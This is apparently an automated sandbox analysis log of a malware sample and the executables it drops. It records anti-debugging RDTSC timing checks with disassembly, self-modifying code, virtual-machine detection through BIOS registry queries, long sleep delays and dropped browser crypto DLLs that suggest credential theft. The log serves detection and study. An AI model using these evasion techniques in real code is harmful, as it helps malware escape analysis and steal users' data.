Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85885F second address: 8588A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F626D6E9A70h 0x0000000c nop 0x0000000d js 00007F626D6E9A6Ch 0x00000013 mov ebx, dword ptr [ebp+122D39E5h] 0x00000019 push 00000000h 0x0000001b sub ebx, 5B235740h 0x00000021 push 00000000h 0x00000023 movzx edi, bx 0x00000026 jbe 00007F626D6E9A68h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jl 00007F626D6E9A68h 0x00000035 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8588A3 second address: 8588A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8588A9 second address: 8588AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85A970 second address: 85A975 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85CEAD second address: 85CEBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85CEBC second address: 85CECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85F046 second address: 85F04B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8563C0 second address: 8563C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 858AD6 second address: 858ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 858ADA second address: 858ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 858ADE second address: 858AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85D08B second address: 85D08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85D08F second address: 85D093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85F17F second address: 85F186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85F245 second address: 85F24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 86758A second address: 8675A2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F626C9C9A26h 0x00000008 jmp 00007F626C9C9A2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 866C80 second address: 866CBE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F626D6E9A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F626D6E9A79h 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F626D6E9A71h 0x0000001a jmp 00007F626D6E9A78h 0x0000001f rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 866F7F second address: 866F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 866F84 second address: 866F8E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F626D6E9A6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 866F8E second address: 866FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F626C9C9A37h 0x0000000d jmp 00007F626C9C9A36h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 86B981 second address: 86B997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F626D6E9A6Fh 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 86B997 second address: 86B99B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 86B99B second address: 86B9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007F626D6E9A6Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 86B9B5 second address: 86B9B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 86BAB9 second address: 86BB0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F626D6E9A6Dh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jnc 00007F626D6E9A7Ch 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 86BB0C second address: 86BB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 871EF5 second address: 871EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 870C4B second address: 870C5A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F626C9C9A26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 870C5A second address: 870C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F626D6E9A66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8714C8 second address: 8714CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8714CC second address: 8714D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8714D0 second address: 8714D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8718D2 second address: 871900 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F626D6E9A6Eh 0x00000008 jo 00007F626D6E9A66h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 jmp 00007F626D6E9A76h 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 871A84 second address: 871A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 871A89 second address: 871A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 877E77 second address: 877E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F626C9C9A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F626C9C9A26h 0x00000014 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876857 second address: 876877 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F626D6E9A78h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876877 second address: 87687B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8769C0 second address: 8769E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F626D6E9A66h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F626D6E9A77h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8769E7 second address: 8769EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8769EB second address: 876A15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F626D6E9A6Fh 0x0000000e jmp 00007F626D6E9A6Dh 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876B4A second address: 876B5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F626C9C9A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876B5A second address: 876B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626D6E9A6Eh 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876B6C second address: 876B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F626C9C9A2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876D08 second address: 876D1B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F626D6E9A6Ah 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876E77 second address: 876E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F626C9C9A2Ch 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 876E8F second address: 876E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FCFAEA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 116F589 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1195DCF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11F76D3 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Special instruction interceptor: First address: 839AF1 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Special instruction interceptor: First address: 68C1BE instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Special instruction interceptor: First address: 68ED26 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Special instruction interceptor: First address: 8C93C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 999AF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EC1BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EED26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A293C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: EC8DA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 107C6E7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 10A18CC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: EC8DD3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Special instruction interceptor: First address: 8DFAEA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Special instruction interceptor: First address: A7F589 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Special instruction interceptor: First address: AA5DCF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Special instruction interceptor: First address: B076D3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: CDDD0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: E85434 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: CDDBF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: F1AFA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 5C4DD0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 5DF5434 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 5C4DBF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 5E8AFA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 643DD0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 65E5434 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 643DBF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 667AFA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 68AFAEA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 6A4F589 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 6A75DCF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Special instruction interceptor: First address: 6AD76D3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: A0DD0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: BB5434 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: A0DBF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Special instruction interceptor: First address: C4AFA4 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Memory allocated: 4EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Memory allocated: 50E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Memory allocated: 4F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Memory allocated: 5270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Memory allocated: 5430000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Memory allocated: 5270000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsKECBGCGCGI.exe

Code function: 19_2_04A10C2A rdtsc

19_2_04A10C2A

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 354
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 3689
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 3133
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 709
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3410
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3692
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2271
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4584

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 2748	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1372	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1240	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4040	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2128	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1600	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5808	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180	Thread sleep count: 63 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180	Thread sleep time: -126063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8156	Thread sleep count: 65 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8156	Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8136	Thread sleep count: 354 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8136	Thread sleep time: -10620000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8132	Thread sleep count: 59 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8132	Thread sleep time: -118059s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9192	Thread sleep count: 3689 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9192	Thread sleep time: -7381689s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148	Thread sleep count: 3133 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148	Thread sleep time: -6269133s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8088	Thread sleep count: 55 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8088	Thread sleep time: -110055s >= -30000s
